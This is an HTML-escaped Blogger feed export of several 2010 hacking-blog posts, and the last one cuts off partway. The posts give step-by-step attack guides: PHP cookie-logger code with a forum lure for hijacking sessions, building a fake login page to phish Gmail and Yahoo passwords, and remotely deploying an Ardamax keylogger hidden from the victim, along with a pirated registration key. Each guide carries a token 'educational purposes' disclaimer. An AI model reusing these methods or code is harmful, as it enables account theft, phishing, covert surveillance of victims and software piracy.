/&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Cookies &lt;span class="IL_AD" id="IL_AD3"&gt;stores&lt;/span&gt; all the necessary  Information about one’s account , using this information you can hack  anybody’s account and change his password. If you get the Cookies of the  Victim you can Hack any account the Victim is Logged into i.e. you can  hack Google, Yahoo, Orkut, Facebook, Flickr etc.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;What is a CookieLogger?&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;A CookieLogger is a Script that is Used to Steal anybody’s Cookies and  stores it into a Log File from where you can read the Cookies of the  Victim.&lt;br /&gt;&lt;br /&gt;Today I am going to show &lt;strong&gt;How to make your own Cookie Logger&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;How to hack into an email account&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;step 1:&lt;/strong&gt;First you have to &lt;a href="" id="AdBriteInlineAd_create" name="AdBriteInlineAd_create" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;create&lt;/a&gt; a file which can  capture a person's cookie.So follow the following process.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ziddu.com/download/6391784/script.rar.html"&gt;Download  the script&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step 2:&lt;/strong&gt;Now you have to change  "http://rafayhackingarticles.blogspot.com" to your your site.&lt;br /&gt;Remember one thing you should not upload the files into a directory.&lt;br /&gt;Now open notepad and paste the script in it and save it as fun.gif&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;step 3:&lt;/strong&gt;Copy the Following Script into a Notepad File  and Save the file as cookielogger.php:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;$filename = “logfile.txt”;&lt;br /&gt;if (isset($_GET["cookie"]))&lt;br /&gt;{&lt;br /&gt;if (!$handle = fopen($filename, ‘a’))&lt;br /&gt;{&lt;br /&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;else&lt;br /&gt;{&lt;br /&gt;if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)&lt;br /&gt;{&lt;br /&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;br /&gt;fclose($handle);&lt;br /&gt;exit;&lt;br /&gt;}&lt;br /&gt;echo “Temporary Server Error,Sorry for the inconvenience.”;&lt;br /&gt;exit;&lt;br /&gt;?&amp;gt;&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step 4:&lt;/strong&gt;Create a new Notepad File and Save it as  logfile.txt&lt;br /&gt;&lt;br /&gt;Upload this file to your server&lt;br /&gt;&lt;br /&gt;cookielogger.php -&amp;gt; http://www.yoursite.com/cookielogger.php&lt;br /&gt;logfile.txt -&amp;gt; http://www.yoursite.com/logfile.txt (chmod 777)&lt;br /&gt;fun.gif -&amp;gt; http://www.yoursite.com/fun.gif&lt;br /&gt;&lt;br /&gt;If you don’t have any Website then you can use the following Website to &lt;span class="IL_AD" id="IL_AD1"&gt;get a Free Website&lt;/span&gt; which has php  support :&lt;br /&gt;&lt;br /&gt;www.ofees.net&lt;br /&gt;www.t35.com&lt;br /&gt;www.ripway.com&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Step 5:&lt;/strong&gt;Go to the victim &lt;a href="" id="AdBriteInlineAd_forum" name="AdBriteInlineAd_forum" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;forum&lt;/a&gt; and insert this code  in the signature or a post :&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;[url=&lt;span style="color: red;"&gt;http://www.yoursite.com&lt;/span&gt;/fun.gif][img]&lt;span style="color: red;"&gt;http://yoursite.com/&lt;/span&gt;fun.jpg[/img][/url]&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;So the person who &lt;a href="" id="AdBriteInlineAd_click" name="AdBriteInlineAd_click" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;click&lt;/a&gt; it will think it is  fun.jpg but it &lt;a href="" id="AdBriteInlineAd_redirects" name="AdBriteInlineAd_redirects" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;redirects&lt;/a&gt; to fun.gif&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span class="IL_AD" id="IL_AD5"&gt;Step 6&lt;/span&gt;:&lt;/strong&gt;So if you  click the image you will get a temporary error and you will find the  cookie in the logfile.txt&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;step 7:&lt;/strong&gt;And something like this will be stored in your  "logfile.txt"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D;  phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9&lt;br /&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;&lt;span class="IL_AD" id="IL_AD6"&gt;Step 8&lt;/span&gt;:&lt;/strong&gt;To get  the access to the Victim’s Account you need to replace your cookies with  the Victim’s Cookie. You can use a Cookie Editor for this. The string  before “=” is the name of the cookie and the string after “=” is its  value. So Change the values of the cookies in the cookie Editor.&lt;br /&gt;&lt;br /&gt;Now for this you will need a firefox addon named "Add and edit  cookies"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h6&gt;Warning:This post "How to hack into an email account:cookie logger  is truly for educational purposes i dont take responsibility for how you  use it&lt;/h6&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-4515623353221579803?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/4515623353221579803/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-into-email-account.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4515623353221579803'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/4515623353221579803'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-hack-into-email-account.html' title='How to hack into an email account'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-6079236141011141234</id><published>2010-01-31T07:09:00.001-08:00</published><updated>2010-01-31T07:09:27.251-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>How to create fake login page</title><content type='html'>A Fake Login Page is a page that exactly resembles the original login  page of sites like Yahoo,Gmail etc.However, these Fake login &lt;a href="" id="AdBriteInlineAd_pages" name="AdBriteInlineAd_pages" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;pages&lt;/a&gt; are created just for  the purpose of stealing other’s passwords.&lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In my last post &lt;b&gt;&lt;span style="color: #3d85c6;"&gt;hack yahoo using fake login page&lt;/span&gt;&lt;/b&gt;  i showed you to &lt;b&gt;create fake login page &lt;/b&gt;of yahoo..&lt;br /&gt;But i was asked by many others that what about other sites, HOw would i &lt;b&gt;create  fake login page&lt;/b&gt; for other sites such as  orkut,facebook,myspace,gmail and etc&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So in this post i will show method to &lt;b&gt;create Fake login page &lt;/b&gt; for  &lt;a href="" id="AdBriteInlineAd_desired" name="AdBriteInlineAd_desired" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;desired&lt;/a&gt; site:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;How to create fake login page&lt;/h1&gt;Now it's &lt;span class="IL_AD" id="IL_AD6"&gt;easy to build&lt;/span&gt; a Fake Login Pages without any  knowledge of &lt;span class="IL_AD" id="IL_AD4"&gt;Programming Languages&lt;/span&gt;.  One can use &lt;a href="http://www.jotform.com/"&gt;&lt;span style="color: red;"&gt;http://www.jotform.com&lt;/span&gt;&lt;/a&gt;  to build the &lt;span class="IL_AD" id="IL_AD5"&gt;Sign Up page&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;{1} Open www.jotform.com and Sign Up.&lt;br /&gt;{2} then Login there with your newly registered account.&lt;br /&gt;{3} now &lt;a href="" id="AdBriteInlineAd_click" name="AdBriteInlineAd_click" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;click&lt;/a&gt; on ‘ Create your  first form’.&lt;br /&gt;{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To  delete entries, select the particular entry and then click on the cross  sign.)&lt;br /&gt;{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option  to Edit the First Name is activated, type there “username:” (for Gmail)  or YahooId: (for Yahoo)&lt;br /&gt;{6} Now Click on ‘Power Tool’ Option (In right hand side…)&lt;br /&gt;{7} Double click on ‘Password Box’. Now Click the newly form password  entry to edit it. Rename it as ‘Password:’&lt;br /&gt;{8} Now Click on ‘Properties’ Option (In right hand side…). These are  the form properties.&lt;br /&gt;{9} You can give any title to your form. This title is used to  distinguish your forms. This Title cannot be seen by the victim.&lt;br /&gt;{10} Now in Thank You URL you must put some link, like  http://www.google.com or anything. Actually after entering username  &amp;amp; password, user will get &lt;a href="" id="AdBriteInlineAd_redirect" name="AdBriteInlineAd_redirect" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;redirect&lt;/a&gt; to this  url.(Don’t leave it blank…)&lt;br /&gt;{11} Now Click on ‘Save’. After &lt;span class="IL_AD" id="IL_AD7"&gt;saving&lt;/span&gt;,  click on ‘Source’ Option.&lt;br /&gt;{12} Now you can see two Options, namely ‘Option1′ &amp;amp; ‘Option2′. Copy  the full code of ‘Option2′.&lt;br /&gt;{13} Now open Notepad text editor and write the following code their.&lt;br /&gt;Paste the Option2 code here&lt;br /&gt;{14} And now save this as index.html. And then host it, mean you will  have to put it on the internet so that everyone can view it. Now i think  that you would be knowing it and if in case you do not know it please  leave a comment with your email-id and i will mail you how to do it.&lt;br /&gt;Now you can view it by typing the url in the address bar.&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #663399;"&gt;&lt;b&gt;NOTE&lt;/b&gt;: &lt;b&gt;If u want to  send it to the internet, then first you will have to create a hosting  account which you can create on www.110mb.com and there are many other  sites which you can find on the internet very easily.&lt;br /&gt;I suppose that you created your account at 110mb.com&lt;br /&gt;now login to your account then click on “File Manager”, then click on  “upload files” or just “upload”. Then select the file which you want to  send to the internet and click on upload. And you are done.&lt;br /&gt;Now you can access you file on the net by just typing the url of the  file.&lt;br /&gt;And you will receive password of the users that login to your site  through email-id which you’ve entered while creating the form.&lt;/b&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;Thats how you can &lt;b&gt;create fake login page&lt;/b&gt; for your desired  site,hope you enjoyed the post&lt;br /&gt;&lt;span style="color: #663399;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;i&gt;&lt;span style="color: #663399;"&gt;&lt;b&gt;Warning:Hacking is a Crime  this post is for educational purposes&lt;/b&gt;&lt;/span&gt;&lt;/i&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #3d85c6;"&gt;&lt;b&gt;Update:Jotform.com have  changed their policies so you cant make fake page without a premium  account.I have &lt;a href="" id="AdBriteInlineAd_posted" name="AdBriteInlineAd_posted" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;posted&lt;/a&gt; an updated version  in my post "&lt;a href="http://rafayhackingarticles.blogspot.com/2009/12/how-to-hack-gaia-online-accounts.html" style="color: #3d85c6;"&gt;How to hack gaiaonline accounts&lt;/a&gt;"&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: #3d85c6;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-6079236141011141234?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/6079236141011141234/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-create-fake-login-page.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/6079236141011141234'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/6079236141011141234'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/how-to-create-fake-login-page.html' title='How to create fake login page'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-8257830319953874761</id><published>2010-01-31T07:08:00.001-08:00</published><updated>2010-01-31T07:08:37.923-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>Password Hacking Software</title><content type='html'>Learn reality of &lt;strong&gt;password hacking software&lt;/strong&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;email Hacking Software&lt;/span&gt;, &lt;span class="IL_AD" id="IL_AD4"&gt;Email Hacking&lt;/span&gt; Software, &lt;a href="" id="AdBriteInlineAd_Yahoo" name="AdBriteInlineAd_Yahoo" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;Yahoo&lt;/a&gt; Password Hacking  Software, Hotmail Password Hacking Software,msn hacker,Hotmail hacker&lt;br /&gt;&lt;br /&gt;Don’t get fooled by these words. Learn the Real of of hacking &lt;span class="IL_AD" id="IL_AD3"&gt;email passwords&lt;/span&gt;. Identify which Hacking  Softwares work and which doesn’t. Most of us are very curious about &lt;span class="IL_AD" id="IL_AD5"&gt;a software&lt;/span&gt; that can hack &lt;a href="" id="AdBriteInlineAd_email" name="AdBriteInlineAd_email" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;email&lt;/a&gt; passwords. In fact  most of the searches about hacking contain the keyword &lt;span style="font-weight: bold;"&gt;passwords hacking software&lt;/span&gt; or &lt;b&gt;email  hacking software&lt;/b&gt;. But is it really possible to hack an email using a  software? Does there exist a software to hack email passwords? In this  post I’ll explain every possible information that you &lt;span class="IL_AD" id="IL_AD7"&gt;need to know&lt;/span&gt; about an email &lt;span class="IL_AD" id="IL_AD2"&gt;hacking software&lt;/span&gt;.&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;h1&gt;Password hacking software - Reality&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;Guys, i want to tell you that there is no such &lt;span style="font-weight: bold;"&gt;password hacking software&lt;/span&gt;. Totally depressed?? I am sorry  to say, but this is true. There is no such &lt;span style="font-weight: bold;"&gt;email hacking software&lt;/span&gt;. So stop searching for such email  hacking software. Stop fooling yourselve. Just use your sense guys. If  there exists such a software, will there be any security on web. And all  expert engineers at Google, Yahoo and other &lt;a href="" id="AdBriteInlineAd_services" name="AdBriteInlineAd_services" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;services&lt;/a&gt; are not mad.  They are all engaged in ensuring security of their &lt;a href="" id="AdBriteInlineAd_customers" name="AdBriteInlineAd_customers" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;customers&lt;/a&gt; ie email  account owners. So, no such software exists.&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/_fMrF3L8CTmg/SrPEf6VLxBI/AAAAAAAAAJE/wDxn7fNK5k0/s1600-h/emailhackingsoftware.jpg" onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}"&gt;&lt;img alt="Email hacking software" border="0" id="BLOGGER_PHOTO_ID_5382862032150971410" src="http://4.bp.blogspot.com/_fMrF3L8CTmg/SrPEf6VLxBI/AAAAAAAAAJE/wDxn7fNK5k0/s320/emailhackingsoftware.jpg" style="cursor: pointer; display: block; height: 202px; margin: 0px auto 10px; text-align: center; width: 320px;" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;b&gt;THINGS YOU SHOULD KNOW BEFORE PROCEEDING&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;Many sites on the internet claim to sell softwares/programs to hack  email passwords. I know most of you are aware of this. These sites also  boast that their software can hack email passwords with in minutes. Some  sites also claim that they can hack any one’s password for money (say  $100). Never believe these sites. They are all scam! I can dare  challenge anyone who claims to hack an email, using a software program.  In fact when I was a newbie in the field of Hacking, I have spent many  sleepless nights in search of an Email hacking software. Finally I ended  up only with frustration and nothing more than that. I don’t want my  readers to commit the same mistake which I did. So, never believe those  scam sites and empty your pockets by spending on useless softwares.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;span class="fullpost"&gt;&lt;span style="font-weight: bold;"&gt;HOW CAN I HACK AN EMAIL PASSWORD&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Well there are couple of methods to hack an email account&lt;br /&gt;&lt;br /&gt;1.&lt;a href="http://rafayhackingarticles.blogspot.com/2009/03/brute-force-attack.html"&gt;Brute  force&lt;/a&gt;&lt;br /&gt;2.&lt;a href="http://en.wikipedia.org/wiki/Dictionary_attack"&gt;Dictionary  attack&lt;/a&gt;&lt;br /&gt;3.&lt;a href="http://en.wikipedia.org/wiki/Cross-site_scripting"&gt;Input  validation attack&lt;/a&gt;&lt;br /&gt;4.&lt;a href="http://rafayhackingarticles.blogspot.com/2009/07/how-to-create-fake-login-page-for-any.html"&gt;Phishing&lt;/a&gt;&lt;br /&gt;5.&lt;a href="http://rafayhackingarticles.blogspot.com/2009/04/hack-account-password-with-ardamax.html"&gt;keylogging&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;These are the &lt;span style="font-weight: bold;"&gt; common email hacking  methods&lt;/span&gt; which i know&lt;br /&gt;I have posted a detailed  &lt;a href="" id="AdBriteInlineAd_posts" name="AdBriteInlineAd_posts" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;posts&lt;/a&gt; on 3 of them.&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7452296460835263490-8257830319953874761?l=bhaukadimag.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bhaukadimag.blogspot.com/feeds/8257830319953874761/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/password-hacking-software.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/8257830319953874761'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7452296460835263490/posts/default/8257830319953874761'/><link rel='alternate' type='text/html' href='http://bhaukadimag.blogspot.com/2010/01/password-hacking-software.html' title='Password Hacking Software'/><author><name>Akshay</name><uri>http://www.blogger.com/profile/16873342237628129989</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='16479660345720215528'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_fMrF3L8CTmg/SrPEf6VLxBI/AAAAAAAAAJE/wDxn7fNK5k0/s72-c/emailhackingsoftware.jpg' height='72' width='72'/><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7452296460835263490.post-4294542748482035078</id><published>2010-01-31T07:07:00.001-08:00</published><updated>2010-01-31T07:07:42.240-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Email hacking'/><title type='text'>How to install a keylogger remotely</title><content type='html'>In my last &lt;a href="" id="AdBriteInlineAd_post" name="AdBriteInlineAd_post" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;post&lt;/a&gt; keylogger  to hack password:aradamax keylogger i told you about aradamax  keylogger and its features.I was asked by many of my &lt;a href="" id="AdBriteInlineAd_readers" name="AdBriteInlineAd_readers" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;readers&lt;/a&gt; that "&lt;span style="font-weight: bold;"&gt;How to install a keylogger remotely&lt;/span&gt;"  well today my post will give you complete &lt;span class="IL_AD" id="IL_AD7"&gt;information&lt;/span&gt; on &lt;span style="font-weight: bold;"&gt;How  to install a keylogger remotely&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="" name="more"&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Note:&lt;/span&gt;&lt;br /&gt;If you want to attach the keylogger to an existing file, go ahead and  place that on your desktop.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h1&gt;How to install a keylogger remotely - Method&lt;/h1&gt;&lt;br /&gt;&lt;br /&gt;A step-by-step guide to successfully creating a deployment package,  sending it, and receiving information using &lt;span style="font-weight: bold;"&gt;Ardamax Keylogger&lt;/span&gt;. Now, in this guide, I only use one  method of receiving information, and that's an FTP. I also do not  protect the files. Any suggestions and comments are appreciated.&lt;br /&gt;&lt;br /&gt;Download &lt;a href="http://rapidshare.com/files/47779604/Setup.rar"&gt;Free  aradamax keylogger to hack password&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Now, open it, and it should give you a name and a jumble of &lt;span class="IL_AD" id="IL_AD2"&gt;letters and numbers&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Go back to the Ardamax icon at the bottom right, and right-&lt;a href="" id="AdBriteInlineAd_Click" name="AdBriteInlineAd_Click" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;click&lt;/a&gt; it.&lt;br /&gt;&lt;br /&gt;Click the "&lt;span style="font-weight: bold;"&gt;Enter Registration Key&lt;/span&gt;"  button.&lt;br /&gt;&lt;br /&gt;Now enter this code to unlock full version:&lt;br /&gt;&lt;br /&gt;&lt;span style="color: #ff6600;"&gt;Name: nGen 2oo6&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;span style="color: #ff6600;"&gt;Key: RTHUUGQVAWDFOQT&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Or if you choose another version of aradamax keylogger then get serial &lt;br /&gt;from this website:&lt;br /&gt;&lt;br /&gt;http://www.theserials.com/serial/serial_ardamax.html&lt;br /&gt;&lt;br /&gt;Now you are ready to &lt;span style="font-weight: bold;"&gt;install keylogger  remotely&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Again, right click the icon at the bottom-right.&lt;br /&gt;&lt;br /&gt;Click "&lt;span style="font-weight: bold;"&gt;&lt;span class="IL_AD" id="IL_AD1"&gt;Remote  Installation&lt;/span&gt;&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Now, if you want to attach your keylogger to an existing file, &lt;span class="IL_AD" id="IL_AD3"&gt;tick&lt;/span&gt; the box that says "Append  keylogger engine to.." etc&lt;br /&gt;&lt;br /&gt;If you tick it, click Browse, and select the file.&lt;br /&gt;&lt;br /&gt;If not, continue down. The installation folder on target computer needs  to remain Windows System Folder for &lt;a href="" id="AdBriteInlineAd_added" name="AdBriteInlineAd_added" style="background: url(&amp;quot;http://files.adbrite.com/mb/images/green-double-underline-006600.gif&amp;quot;) repeat-x scroll center bottom transparent; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top"&gt;added&lt;/a&gt; security, so leave it  be.&lt;br /&gt;&lt;br /&gt;Add any additional components you would like. I just leave mine as "&lt;span style="font-weight: bold;"&gt;log viewer&lt;/span&gt;".&lt;br /&gt;&lt;br /&gt;From this point, click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Tick all of the boxes, as to hide it from everything visible, otherwise  they can just see it and be like "Wtf", uninstall, etc.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;For Security, do what you want. I leave all of it as-is and click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt; again.&lt;br /&gt;&lt;br /&gt;Now, untick the "Check for updates" box, else it will check for updates  on their computer and they will know that they are bugged.&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Tick the "&lt;span style="font-weight: bold;"&gt;Start in hidden mode&lt;/span&gt;"  box, and leave the "Run on windows startup" as-is.&lt;br /&gt;&lt;br /&gt;You may pick a date to self destruct, if you like. Sounds noisy,It  simply removes itself on selected date. If not, leave it alone, and it  will never self destruct.&lt;br /&gt;&lt;br /&gt;Click &lt;span style="font-weight: bold;"&gt;next&lt;/span&gt;.&lt;br /&gt;&lt;br /&gt;Tick the "&lt;span style="font-weight: bold;"&gt;Send logs every&lt;/span&gt;.."  box, and choose how frequently you would like to recieve information  that has been sent.&lt;br /&gt;&lt;br /&gt;Select '&lt;span style="font-weight: bold;"&gt;FTP&lt;/span&gt;' and de-select  everything else as a delivery method.&lt;br /&gt;&lt;br /&gt;You may choose to take out screenshots. &lt;br /&gt;&lt;br /&gt;Leave log format alone.&lt;br /&gt;&lt;br /&gt;You may choose to send logs if it exceeds a certain size, or if you want  it to send no matter what, untick the box, which is what I do.&lt;br /&gt;&lt;br /&gt;Click on &lt;span style="font-weight: 